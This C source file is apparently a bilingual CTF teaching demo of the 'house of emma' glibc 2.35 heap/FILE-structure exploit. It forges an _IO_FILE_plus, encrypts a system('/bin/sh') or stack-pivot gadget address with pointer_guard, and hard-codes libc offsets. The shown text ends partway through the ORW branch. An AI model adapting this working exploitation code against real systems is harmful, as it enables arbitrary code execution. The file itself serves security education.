1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519
| #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h>
#define GETSHELL_MODE 1 #define ORW_MODE 2
int mode = ORW_MODE; char* sh = "/bin/sh"; char* flag = "./flag"; size_t space[0x100];
int main() { setvbuf(stdin,0LL,2,0LL); setvbuf(stdout,0LL,2,0LL); puts("\033[32mHello! today let's learn something about house of emma.\033[0m"); puts("\033[32m本程序用于演示house of emma的漏洞利用原理。\033[0m"); puts("\033[1;31mTested in Ubuntu 22.04, glibc version: Ubuntu GLIBC 2.35-0ubuntu3.1\033[0m"); puts("\033[1;31m测试环境:Ubuntu 22.04,glibc版本为2.35-0ubuntu3.1\033[0m"); puts("\033[32mHouse of emma is used for high version of glibc, it utilizes _IO_FILE struct to exploit.\033[0m"); puts("\033[32mhouse of emma 适用于高版本glibc,它使用_IO_FILE结构体进行漏洞利用。\033[0m"); puts("\033[32mSame as other way of exploitation with _IO_FILE, it also use fake _IO_FILE struct.\033[0m"); puts("\033[32m与其他利用_IO_FILE结构体漏洞的方法相同,它也利用了伪造的_IO_FILE结构体。\n\033[0m"); puts("\033[32mIt can be triggered by function __malloc_assert, so it always go with heap vulnerabilities.\033[0m"); puts("\033[32m它可以通过函数__malloc_assert触发,因此它常常与堆漏洞相联系。\033[0m"); puts("\033[32mFirst we need to know the structure of _IO_FILE in glibc 2.35:\033[0m" "\033[32m首先我们需要了解一下glibc 2.35版本下_IO_FILE结构体的内容:\n\033[0m" "\033[33m(line 49, /libio/bits/types/struct_FILE.h)\033[0m"); puts("\033[34mstruct _IO_FILE\n" "{\n" " int _flags;\t\t/* High-order word is _IO_MAGIC; rest is flags. */\n" "\n" " /* The following pointers correspond to the C++ streambuf protocol. */\n" " char *_IO_read_ptr;\t/* Current read pointer */\n" " char *_IO_read_end;\t/* End of get area. */\n" " char *_IO_read_base;\t/* Start of putback+get area. */\n" " char *_IO_write_base;\t/* Start of put area. */\n" " char *_IO_write_ptr;\t/* Current put pointer. */\n" " char *_IO_write_end;\t/* End of put area. */\n" " char *_IO_buf_base;\t/* Start of reserve area. */\n" " char *_IO_buf_end;\t/* End of reserve area. */\n" "\n" " /* The following fields are used to support backing up and undo. */\n" " char *_IO_save_base; /* Pointer to start of non-current get area. */\n" " char *_IO_backup_base; /* Pointer to first valid character of backup area */\n" " char *_IO_save_end; /* Pointer to end of non-current get area. */\n" "\n" " struct _IO_marker *_markers;\n" "\n" " struct _IO_FILE *_chain;\n" "\n" " int _fileno;\n" " int _flags2;\n" " __off_t _old_offset; /* This used to be _offset but it's too small. */\n" "\n" " /* 1+column number of pbase(); 0 is unknown. */\n" " unsigned short _cur_column;\n" " signed char _vtable_offset;\n" " char _shortbuf[1];\n" "\n" " _IO_lock_t *_lock;\n" "#ifdef _IO_USE_OLD_IO_FILE\n" "};\n\033[0m");
puts("\033[32mThe key element we need to forge is the *vtable pointer.\033[0m"); puts("\033[32m其中的关键就是*vtable指针。\033[0m"); puts("\033[32mIt's worth noticing that we need to write correct *_lock value in our fake _IO_FILE.\033[0m"); puts("\033[32m值得注意的是,我们需要写入正确的*_lock指针值到伪造的_IO_FILE结构体中。\033[0m"); puts("\033[32mThe value of *_lock should be \033[31m_IO_stdfile_1_lock.\033[0m"); puts("\033[32m*_lock的值应该是\033[31m_IO_stdfile_1_lock.\033[0m"); puts("\033[32mSo that we need to know the loading base address of libc.\033[0m"); puts("\033[32m所以我们需要知道libc的加载基地址。\n\033[0m");
puts("\033[35mNow let's get loading base address of libc through the address of function puts().\033[0m"); puts("\033[35m现在让我们通过puts()函数获取一下libc的加载基地址。\033[0m");
int(*func)(const char*) = puts; printf("\033[32mThe address of function puts() is: \033[31m%p\n\033[0m", func); printf("\033[32mputs函数的地址为: \033[31m%p\n\033[0m", func); printf("\033[32mSo that the loading address of libc is: \033[31m%p\n\033[0m", func - 0x80ed0); printf("\033[32m因此libc的加载地址为: \033[31m%p\n\033[0m", func - 0x80ed0); puts("\033[33m(The offset address of function puts() is 0x80ed0)\033[0m"); puts("\033[33m(puts函数的偏移量为0x80ed0)\n\033[0m");
size_t libc_base = (size_t)(func - 0x80ed0); size_t stderr_ptr = (size_t)(libc_base + 0x21a860);
printf("\033[32mSince we know the libc base address, we can also know the address of pointer stderr: \033[31m%p\033[0m\n", (void*)stderr_ptr); printf("\033[32m既然现在我们已经知道了libc的加载地址,我们也可以获得stderr指针的地址: \033[31m%p\033[0m\n", (void*)stderr_ptr);
puts("\033[32mNow let's satisfy the second prerequisite of the exploit: \033[0m"); puts("\033[32m下面让我们构造一下这个漏洞利用的第二个前提条件: \033[0m"); puts("\033[33mGet the value of pointer_guard or change it to a known value.\033[0m"); puts("\033[33m获取到pointer_guard的值并将其修改为一个已知值。\033[0m"); puts("\033[32mOur house of emma has a stable call chain, and we'll need the value to guide rip to the function we want.\033[0m"); puts("\033[32m我们的house of emma利用方式有一条完整的函数调用链,我们需要这个pointer_guard的值来引导rip到我们想要的函数。\033[0m"); puts("\033[32mWhere the value is used will be introduced later.\033[0m"); puts("\033[32m我们之后将会介绍这个pointer_guard的地址在什么地方。\033[0m"); puts("\033[32mIt's worth noticing that\033[31m the value of pointer guard is not located in libc, while before libc.\033[0m"); puts("\033[32m需要注意的是pointer guard的值并不在libc中,而是在libc的低地址处。\033[0m"); puts("\033[32mIf you use pwndbg, you can see that before libc, there exists an anonymous space, with its size of 0x3000.\033[0m"); puts("\033[32m如果使用pwndbg,你可以看到在libc前面有一个匿名的内存区域,大小为0x3000。\033[0m"); puts("\033[32mThe tls struct is located in this anonymous area, which includes the value of pointer_guard.\033[0m"); puts("\033[32mtls结构体就位于这个匿名的内存空间中,它包含有pointer_guard。\033[0m"); puts("\033[32mTo be more detail, the value of pointer_guard is located in (libc_base - 0x3000 + 0x770)\033[0m"); puts("\033[32m更具体地说,pointer_guard的值应该位于(libc_base - 0x3000 + 0x770)\n\033[0m");
puts("\033[32mActually, the name of the struct is \033[31mtcbhead_t\033[32m. Here is the structure:\033[0m"); puts("\033[32m实际上,这个结构体的名字是\033[31mtcbhead_t\033[32m. 下面是它的构造:\033[0m"); puts("\033[33m(line 36, /sysdeps/x86_64/nptl/tls.h)\033[0m"); puts("\033[34mtypedef struct\n" "{\n" " void *tcb;\t\t/* Pointer to the TCB. Not necessarily the\n" "\t\t\t thread descriptor used by libpthread. */\n" " dtv_t *dtv;\n" " void *self;\t\t/* Pointer to the thread descriptor. */\n" " int multiple_threads;\n" " int gscope_flag;\n" " uintptr_t sysinfo;\n" " uintptr_t stack_guard;\n" " uintptr_t pointer_guard;\n" " unsigned long int unused_vgetcpu_cache[2];\n" " /* Bit 0: X86_FEATURE_1_IBT.\n" " Bit 1: X86_FEATURE_1_SHSTK.\n" " */\n" " unsigned int feature_1;\n" " int __glibc_unused1;\n" " /* Reservation of some values for the TM ABI. */\n" " void *__private_tm[4];\n" " /* GCC split stack support. */\n" " void *__private_ss;\n" " /* The lowest address of shadow stack, */\n" " unsigned long long int ssp_base;\n" " /* Must be kept even if it is no longer used by glibc since programs,\n" " like AddressSanitizer, depend on the size of tcbhead_t. */\n" " __128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));\n" "\n" " void *__padding[8];\n" "} tcbhead_t;\033[0m"); puts("\033[32mWe can see that the stack guard is right above the pointer guard, so we can't absolutely change the stack_guard.\033[0m"); puts("\033[32m我们可以发现stack_guard就在pointer_guard的上面,因此我们绝对不能修改stack_guard的值。\033[0m"); printf("\033[32mLet's calculate the address of pointer_guard: \033[31m%p\033[0m\n", (size_t*)(libc_base - 0x3000 + 0x770)); printf("\033[32m让我们计算一下pointer_guard的地址: \033[31m%p\033[0m\n", (size_t*)(libc_base - 0x3000 + 0x770));
size_t* pointer_guard_address = (size_t*)(libc_base - 0x3000 + 0x770); printf("\033[32mThe value of pointer_guard is: \033[31m%#zx\033[0m\n", *pointer_guard_address); printf("\033[32mpointer_guard的值为: \033[31m%#zx\033[0m\n", *pointer_guard_address); puts("\033[32mIn CTF problems you can't always get the original value of pointer_guard, but you can also change it to a known value.\033[0m"); puts("\033[32m在CTF赛题中你可能不能获取到pointer_guard的值,但你可以将其改写为一个已知值。\n\033[0m");
puts("\033[32mOK, now we can try to forge a _IO_FILE struct.\033[0m"); puts("\033[32m那么现在我们就来开始伪造_IO_FILE结构体。\033[0m"); puts("\033[32mAttention: what we forge is actually _IO_FILE_plus struct, which contains a _IO_FILE struct and a vtable pointer(_IO_jump_t*)\033[0m"); puts("\033[32m注意:我们伪造的实际上是_IO_FILE_plus结构体,其包含_IO_FILE结构体的所有内容以及一个vtable指针(_IO_jump_t*)\033[0m");
struct _IO_FILE* fake_file_struct = (struct _IO_FILE*)malloc(0x100); size_t* vtable = (size_t*)((char*)fake_file_struct + sizeof (struct _IO_FILE));
printf("\033[32mWe just allocate a fake _IO_FILE_plus struct into the heap: \033[31m%p\033[m\n", fake_file_struct); printf("\033[32m我们刚刚分配了一个假的_IO_FILE_plus结构体到堆: \033[31m%p\033[m\n", fake_file_struct); printf("\033[32mThe address of fake _IO_FILE_plus is: \033[31m%p\033[0m\n", fake_file_struct); printf("\033[32m这个假的_IO_FILE_plus结构体的地址为: \033[31m%p\033[0m\n", fake_file_struct); printf("\033[32mThe address of vtable pointer is: \033[31m%p\033[0m\n", vtable); printf("\033[32mvtable指针的地址为: \033[31m%p\033[0m\n", vtable); puts("\033[32mThen we are going to change the value of _lock and vtable pointer.\033[0m"); puts("\033[32m然后我们来修改_lock和vtable指针的值。\033[0m"); puts("\033[32mThe _lock should be changed into \033[31m_IO_stdfile_1_lock\033[32m, which is in \033[31m(libc_base + 0x21ba70).\033[0m"); puts("\033[32m_lock的值应该被修改为\033[31m_IO_stdfile_1_lock\033[32m, 它的地址为\033[31m(libc_base + 0x21ba70).\033[0m"); puts("\033[32mThe vtable should be changed into \033[31m(_IO_cookie_jumps + 0x38)\033[32m, " "which points to function \033[31m_IO_file_xsputn.\033[0m"); puts("\033[32mvtable指针应该被修改为\033[31m(_IO_cookie_jumps + 0x38)\033[32m, " "其指向函数\033[31m_IO_file_xsputn.\033[0m\n");
printf("\033[32mBefore alteration: fake_file_struct->_lock = \033[33m%p\033[0m\n", fake_file_struct->_lock); printf("\033[32m修改前: fake_file_struct->_lock = \033[33m%p\033[0m\n", fake_file_struct->_lock); fake_file_struct->_lock = (void *) (libc_base + 0x21ba70); printf("\033[32mAfter alteration: fake_file_struct->_lock = \033[31m%p\033[0m\n", fake_file_struct->_lock); printf("\033[32m修改后: fake_file_struct->_lock = \033[31m%p\033[0m\n\n", fake_file_struct->_lock);
printf("\033[32mBefore alteration: fake_file_struct->vtable = \033[33m%#zx\033[0m\n", *vtable); printf("\033[32m修改前: fake_file_struct->vtable = \033[33m%#zx\033[0m\n", *vtable); *vtable = (size_t)(libc_base + 0x215b80 + 0x38); printf("\033[32mAfter alteration: fake_file_struct->vtable = \033[31m%#zx\033[0m\n", *vtable); printf("\033[32m修改后: fake_file_struct->vtable = \033[31m%#zx\033[0m\n\n", *vtable);
size_t* top_chunk_size = (size_t*)((char*)fake_file_struct + 0x108); printf("\033[32mThrough pwndbg, we can see that the size of top chunk is at fake_file_struct + 0x108 = %p\033[0m\n", top_chunk_size); printf("\033[32m通过pwndbg我们可以看到top chunk的大小保存在fake_file_struct + 0x108 = %p\033[0m\n", top_chunk_size); printf("\033[32mThe value of top_chunk->size is: %#zx\033[0m\n", *top_chunk_size); printf("\033[32mtop chunk的大小top_chunk->size为: %#zx\033[0m\n", *top_chunk_size); puts("\033[32mIn function sysmalloc, there is a check for page alignment of top chunk: \n\033[0m"); puts("\033[32m在函数sysmalloc中,有一个检查top chunk页对齐的代码片段: \033[0m"); puts("\033[33m(line 2617, /malloc/malloc.c)\033[0m"); puts("\033[34m assert ((old_top == initial_top (av) && old_size == 0) ||\n" " ((unsigned long) (old_size) >= MINSIZE &&\n" " prev_inuse (old_top) &&\n" " ((unsigned long) old_end & (pagesize - 1)) == 0));\n\033[0m"); puts("\033[32mThe function assert here in malloc.c is a bit different from that in other file.\033[0m"); puts("\033[32m这个malloc.c中的assert函数与其他文件中的函数不太一样。\033[0m"); puts("\033[32mBecause in malloc.c there is a #define statement: \033[0m"); puts("\033[32m因为在malloc.c中有一个#define语句: \n\033[0m"); puts("\033[33m(line 292, /malloc/malloc.c)\033[0m"); puts("\033[34m# define __assert_fail(assertion, file, line, function)\t\t\t\\\n" "\t __malloc_assert(assertion, file, line, function)\n\033[0m"); puts("\033[32mSo that if the assertion in malloc.c failed, it will call function __malloc_assert.\033[0m"); puts("\033[32m所以如果这个检查失败了,那么它就会调用__malloc_assert.\033[0m");
puts("\033[32mThe content of function __malloc_assert is: \033[0m"); puts("\033[32m__malloc_assert函数的内容为: \033[0m"); puts("\033[33m(line 297, /malloc/malloc.c)\033[0m"); puts("\033[34mstatic void\n" "__malloc_assert (const char *assertion, const char *file, unsigned int line,\n" "\t\t const char *function)\n" "{\n" " (void) __fxprintf (NULL, \"%s%s%s:%u: %s%sAssertion `%s' failed.\\n\",\n" "\t\t __progname, __progname[0] ? \": \" : \"\",\n" "\t\t file, line,\n" "\t\t function ? function : \"\", function ? \": \" : \"\",\n" "\t\t assertion);\n" " fflush (stderr);\n" " abort ();\n" "}\033[0m\n");
puts("\033[32mWhile in function __fxprintf, it will utilize stderr to output something, and that is our chance.\033[0m"); puts("\033[32m函数__fxprintf会利用stderr来输出错误信息,这就是我们利用的机会。\033[0m"); puts("\033[32mThrough forging fake _IO_FILE struct, we can turn to anywhere that can be executed.\033[0m"); puts("\033[32m通过伪造_IO_FILE结构体,我们可以执行任意地址的代码。\033[0m"); puts("\033[32mThe easiest way in CTF is turning the execution flow into one gadget.\033[0m"); puts("\033[32m在CTF比赛中最简单的方法就是将执行流转到one_gadget中。\033[0m"); puts("\033[32mBut one gadgets in libc 2.35 all have many constraints, which we need to pay attention to.\033[0m"); puts("\033[32m但glibc 2.35版本的one gadget有很多的限制条件需要注意。\033[0m"); puts("\033[32mMoreover, many problems today have sandboxes, where you cannot use the syscall EXECVE.\033[0m"); puts("\033[32m另外,现在的很多赛题都有沙箱,我们可能不能调用execve的系统调用。\033[0m"); puts("\033[32mSo stack pivoting may be the most common step in exploitation.\033[0m"); puts("\033[32m因此栈迁移就是本方法利用中较为常用的手段了。\n\033[0m");
puts("\033[32mIn function __vxprintf_internal, which is called indirectly by __fxprintf, it will call function _IO_cookie_read: \033[0m"); puts("\033[32m__fxprintf函数会间接调用到__vxprintf_internal函数,后者会调用_IO_cookie_read函数: \033[0m"); puts("\033[34m<__vfprintf_internal+280> call qword ptr [r12 + 0x38]\033[0m"); puts("\033[32mThe 'r12' here is (_IO_cookie_jumps + 0x38), which is the value of *vtable we wrote in before.\033[0m"); puts("\033[32m这里的r12寄存器的值就是(_IO_cookie_jumps + 0x38), 这就是我们前面写的*vtable值。\033[0m"); puts("\033[32mAs you can see in struct _IO_cookies_jump: \033[0m"); puts("\033[32m就如_IO_cookies_jump中代码展示的这样: \033[0m"); puts("\033[33m(line 111, /libio/iofopncook.c)\033[0m"); puts("\033[34mstatic const struct _IO_jump_t _IO_cookie_jumps libio_vtable = {\n" " JUMP_INIT_DUMMY,\n" " JUMP_INIT(finish, _IO_file_finish),\n" " JUMP_INIT(overflow, _IO_file_overflow),\n" " JUMP_INIT(underflow, _IO_file_underflow),\n" " JUMP_INIT(uflow, _IO_default_uflow),\n" " JUMP_INIT(pbackfail, _IO_default_pbackfail),\n" " JUMP_INIT(xsputn, _IO_file_xsputn),\n" " JUMP_INIT(xsgetn, _IO_default_xsgetn),\n" " JUMP_INIT(seekoff, _IO_cookie_seekoff),\n" " JUMP_INIT(seekpos, _IO_default_seekpos),\n" " JUMP_INIT(setbuf, _IO_file_setbuf),\n" " JUMP_INIT(sync, _IO_file_sync),\n" " JUMP_INIT(doallocate, _IO_file_doallocate),\n" " JUMP_INIT(read, _IO_cookie_read),\n" " JUMP_INIT(write, _IO_cookie_write),\n" " JUMP_INIT(seek, _IO_cookie_seek),\n" " JUMP_INIT(close, _IO_cookie_close),\n" " JUMP_INIT(stat, _IO_default_stat),\n" " JUMP_INIT(showmanyc, _IO_default_showmanyc),\n" " JUMP_INIT(imbue, _IO_default_imbue),\n" "};\n\033[0m"); puts("\033[31m(_IO_cookie_jumps + 0x38) \033[32mpoints to \033[35m_IO_file_xsputn\033[32m.\033[0m"); puts("\033[31m(_IO_cookie_jumps + 0x38) \033[32m指向的是\033[35m_IO_file_xsputn\033[32m.\033[0m"); puts("\033[31m(_IO_cookie_jumps + 0x38 + 0x38) \033[32mpoints to \033[35m_IO_cookie_read\033[32m.\033[0m"); puts("\033[31m(_IO_cookie_jumps + 0x38 + 0x38) \033[32m指向的是\033[35m_IO_cookie_read\033[32m.\033[0m"); puts("\033[32mSo here we let it call _IO_cookie_read function.\033[0m"); puts("\033[32m所以这里我们让程序调用_IO_cookie_read函数.\n\033[0m");
puts("\033[32mThen let's have a look at _IO_cookie_read function.\033[0m"); puts("\033[32m让我们看一下_IO_cookie_read函数的内容。\033[0m"); puts("\033[34m<_IO_cookie_read>:\tendbr64 \n" " <_IO_cookie_read+4>:\tmov rax,QWORD PTR [rdi+0xe8]\n" " <_IO_cookie_read+11>:\tror rax,0x11\n" " <_IO_cookie_read+15>:\txor rax,QWORD PTR fs:0x30\n" " <_IO_cookie_read+24>:\ttest rax,rax\n" " <_IO_cookie_read+27>:\tje <_IO_cookie_read+38>\n" " <_IO_cookie_read+29>:\tmov rdi,QWORD PTR [rdi+0xe0]\n" " <_IO_cookie_read+36>:\t\033[31mjmp rax\033[34m\n" " <_IO_cookie_read+38>:\tmov rax,0xffffffffffffffff\n" " <_IO_cookie_read+45>:\tret\033[0m\n"); puts("\033[32mAs you can see, it directly calls rax, and 'rdi' here is actually our fake _IO_FILE_plus address.\033[0m"); puts("\033[32m可以看到,它直接call rax,这里的rdi实际上就是假的_IO_FILE_plus结构体的地址。\033[0m"); puts("\033[32mSo that we can write any executable address into [rdi+0xe8].\033[0m"); puts("\033[32m因此我们可以将任意可执行的地址写入到[rdi+0xe8].\033[0m"); puts("\033[32mHowever, don't forget some instructions in the middle.\033[0m"); puts("\033[32m但是,别忘了中间还有几条指令。\033[0m"); puts("\033[32mHere, you can see a 'ror' instruction and a 'xor' instruction that change the value of rax.\033[0m"); puts("\033[32m这里你可以看到有一个ror指令和一个xor指令,这些指令会修改rax的值。\033[0m"); puts("\033[32mThat is actually a kind of protection strategy used in high versions of glibc ---- encrypting the address.\033[0m"); puts("\033[32m这实际上是高版本glibc的一种保护方式——将地址进行简单加密。\033[0m"); puts("\033[32mHere, these two instruction is decrypting rax, first ror 11 bits, and second xor fs:0x30h, which is our \033[31mpointer_guard.\033[0m"); puts("\033[32m这里的这两条指令实际上是在解密rax,首先循环右移0x11位,然后异或fs:0x30h,这实际上就是\033[31mpointer_guard.\033[0m"); puts("\033[32mNow you know that why we need the value of pointer_guard, it's important for us to encrypt executable address.\033[0m"); puts("\033[32m现在你应该知道为什么我们需要修改pointer_guard的值了,它对于地址的加密过程很重要。\033[0m"); puts("\033[32mThe encryption algorithm is easy to get: first xor pointer_guard, and second rol 0x11 bits.\033[0m"); puts("\033[32m加密方式很好推出来:首先异或pointer_guard,然后循环左移0x11位。\n\033[0m");
puts("\033[32mPay attention to the instruction before 'jmp rax': mov rdi, QWORD PTR [rdi+0xe0]\033[0m"); puts("\033[32m注意'jmp rax'之前的指令: mov rdi, QWORD PTR [rdi+0xe0]\n\033[0m"); puts("\033[32mIf there is not any sandbox, we can let rax=system() address, and [rdi+0xe0]='/bin/sh' address.\033[0m"); puts("\033[32m如果这里没有沙箱,我们可以让rax等于system函数地址,[rdi+0xe0]等于字符串/bin/sh的地址\033[0m"); puts("\033[32mElse, you can also fill it with 'pcop' to trigger stack pivoting and open, read, write flag file.\033[0m"); puts("\033[32m否则,我们也可以填充pcop的地址来触发栈迁移,然后打开、读、写flag文件。\n\033[0m");
if(mode == 1){ puts("\033[35mYou chose the getshell mode.\033[0m"); puts("\033[35m你选择了getshell模式。\033[0m"); puts("\033[32mSo that we'll write '/bin/sh' address into [rdi+0xe0] and encrypted system() address into [rdi+0xe8]\033[0m"); puts("\033[32m所以我们在[rdi+0xe0]处写入字符串/bin/sh的地址,将加密后的system函数地址写入[rdi+0xe8]处。\033[0m");
char** sh_addr = (char**)((char*)fake_file_struct + 0xe0); printf("\033[32mThe address of string '/bin/sh' should be written in: \033[31m%p\n\033[0m", sh_addr); printf("\033[32m字符串'/bin/sh'的地址应该被写到: \033[31m%p\n\033[0m", sh_addr); *sh_addr = sh; printf("\033[32m指针解引用的值为: \033[31m%p\033[0m\n", *sh_addr);
size_t* system_addr = (size_t*)((char*)fake_file_struct + 0xe8); printf("\033[32mThe address of function system() should be written in: \033[31m%p\n\033[0m", system_addr); printf("\033[32m函数system()的地址应该被写到: \033[31m%p\n\033[0m", system_addr); *system_addr = (size_t)system; printf("\033[32mNow the value of the pointer is: \033[31m%#zx\033[0m\n", *system_addr); printf("\033[32m指针解引用的值为: \033[31m%#zx\033[0m\n", *system_addr); printf("\033[32mThen we need to let it xor with pointer_guard: \033[33m%#zx.\n\033[0m", *pointer_guard_address); printf("\033[32m然后我们需要让这个值异或pointer_guard: \033[33m%#zx.\n\033[0m", *pointer_guard_address); *system_addr ^= *pointer_guard_address; printf("\033[32mAfter xor, the value of [rdi+0xe8] is: \033[35m%#zx\n\033[0m", *system_addr); printf("\033[32m异或之后[rdi+0xe8]的值为: \033[35m%#zx\n\033[0m", *system_addr); puts("\033[32mThen we need to let it rol 0x11 bits.\n\033[0m"); puts("\033[32m然后我们循环左移0x11位:\n\033[0m"); *system_addr = (*system_addr << 0x11) + (*system_addr >> 0x2f); printf("\033[32mAfter rol, the value of [rdi+0xe8] is: \033[35m%#zx\n\033[0m\n", *system_addr); printf("\033[32m循环左移后,[rdi+0xe8]的值为: \033[35m%#zx\n\033[0m\n", *system_addr); }else if(mode == 2){ puts("\033[32mYou chose the orw mode.\033[0m"); puts("\033[32m你选择了orw模式。\033[0m"); puts("\033[1;31mIMPORTANT: You must make sure that there is a flag file in this directory, or we'll be unable to read.\033[0m"); puts("\033[1;31m注意:你必须保证当前文件夹下有一个flag文件,否则该程序将无法读取。\n\033[0m");
puts("\033[32mIn glibc 2.35, we usually use setcontext() function to trigger stack pivoting, but with a little difference from lower versions.\033[0m"); puts("\033[32m在glibc 2.35中,我们一般使用setcontext函数进行栈迁移,但与低版本的glibc的利用方式有一些小差别。\033[0m"); puts("\033[32mIn lower version, the instruction that changes the rsp is: 'mov rsp, [rdi+xx]'.\033[0m"); puts("\033[32m在低版本glibc中,修改rsp的指令为: 'mov rsp, [rdi+xx]'.\033[0m"); puts("\033[32mThe rdi here is our [fake _IO_FILE_plus struct + 0xe0].\033[0m"); puts("\033[32m这里的rdi是[fake _IO_FILE_plus struct + 0xe0].\033[0m"); puts("\033[32mBut in glibc 2.35, the instruction was changed to: \033[31m'mov rsp, [rdx+xx]'\033[32m.\033[0m"); puts("\033[32m但是在glibc 2.35中,这条指令被修改为: \033[31m'mov rsp, [rdx+xx]'\033[32m.\033[0m"); puts("\033[32mSo that we can't change the value of rsp only by writing forged data in our fake _IO_FILE_plus struct.\033[0m"); puts("\033[32m所以我们不能仅通过将假的数据写入到假的_IO_FILE_plus结构体而修改rsp的值。\033[0m"); puts("\033[32mHowever, we still have our way to exploit. It's called pcop, which is just a unique gadget."); puts("\033[32m但我们依然能够进行漏洞利用,需要一个pcop,这是一个特殊的gadget。\n");
puts("\033[32mTry to use this command below in the terminal: \033[0m"); puts("\033[32m可以尝试在终端运行以下命令:: \033[0m"); puts("\033[1;34mobjdump -d /lib/x86_64-linux-gnu/libc.so.6 -M intel | grep '1675b'\033[0m"); puts("\033[32mYou can see a gadget in offset \033[31m0x1675b0\033[32m: \033[0m\n"); puts("\033[32m你可以在偏移\033[31m0x1675b0\033[32m处看到有一个gadget: \033[0m\n"); puts("\033[34m 1675b0: 48 8b 57 08 mov rdx,QWORD PTR [rdi+0x8]\n" " 1675b4: 48 89 04 24 mov QWORD PTR [rsp],rax\n" " 1675b8: ff 52 20 call QWORD PTR [rdx+0x20]\033[0m\n"); puts("\033[32mIt seems that we can use the value of [rdi+0x8] to change rdx to any value as we like.\033[0m"); puts("\033[32m我们似乎可以使用[rdi+0x8]的值去修改rdx的值为任意值。\033[0m"); puts("\033[32mAnd then we can change the rip into [rdx+0x20].\033[0m"); puts("\033[32m然后我们就可以将rip修改到[rdx+0x20]。\033[0m"); puts("\033[32mWe can change rdx to a place that we can control, then write setcontext() address in it to trigger stack pivoting.\033[0m"); puts("\033[32m我们可以将rdx修改到一个我们可以控制的地方,然后将setcontext函数的地址写进去来触发栈迁移。\033[0m"); puts("\033[32mTo keep the environment of heap, we use a space in bss segment to complete this process.\033[0m"); puts("\033[32m为了保持堆环境,我们使用bss段的一块空间来完成这个过程。\033[0m"); printf("\033[32mThe address of bss space is: \033[31m%p\033[32m.\033[0m\n", &space); printf("\033[32mbss对应地址为: \033[31m%p\033[32m.\033[0m\n\n", &space);
puts("\033[32mWe let [rdi+0xe0] = bss address, [rdi+0xe8] = pcop address.\033[0m"); puts("\033[32m我们让[rdi+0xe0] = bss的地址, [rdi+0xe8] = pcop的地址.\033[0m"); size_t* bss_address = (size_t*)((char*)fake_file_struct + 0xe0); printf("\033[32mThe address of bss should be written in: \033[31m%p\n\033[0m", bss_address); printf("\033[32m这个bss的地址应该被写入: \033[31m%p\n\033[0m", bss_address); *bss_address = (size_t)(&space); printf("\033[32mThe value of the pointer is: \033[31m%#zx\033[0m\n", *bss_address); printf("\033[32m这个指针的值现在为: \033[31m%#zx\033[0m\n", *bss_address);
size_t* pcop = (size_t*)((char*)fake_file_struct + 0xe8); printf("\033[32mThe address of pcop should be written in: \033[31m%p\n\033[0m", pcop); printf("\033[32mpcop的地址应该被写入到: \033[31m%p\n\033[0m", pcop); *pcop = (size_t)(libc_base + 0x1675b0); printf("\033[32mThe value of the pointer is: \033[31m%#zx\033[0m\n", *pcop); printf("\033[32m这个指针现在的值为: \033[31m%#zx\033[0m\n", *pcop); puts("\033[32mDon't forget we need to encrypt the pcop value.\033[0m"); puts("\033[32m别忘了我们需要加密pcop的值。\033[0m");
printf("\033[32mThen we need to let it xor with pointer_guard: \033[33m%#zx.\n\033[0m", *pointer_guard_address); printf("\033[32m然后我们需要让pcop与pointer_guard异或: \033[33m%#zx.\n\033[0m", *pointer_guard_address); *pcop ^= *pointer_guard_address; printf("\033[32mAfter xor, the value of [rdi+0xe8] is: \033[35m%#zx\n\033[0m", *pcop); printf("\033[32m异或之后,[rdi+0xe8]的值为: \033[35m%#zx\n\033[0m", *pcop);
puts("\033[32mThen we need to let it rol 0x11 bits.\033[0m"); puts("\033[32m然后我们让它循环左移0x11位。\033[0m"); *pcop = (*pcop << 0x11) + (*pcop >> 0x2f); printf("\033[32mAfter rol, the value of [rdi+0xe8] is: \033[35m%#zx\n\033[0m\n", *pcop); printf("\033[32m循环左移之后,[rdi+0xe8]的值为: \033[35m%#zx\n\033[0m\n", *pcop);
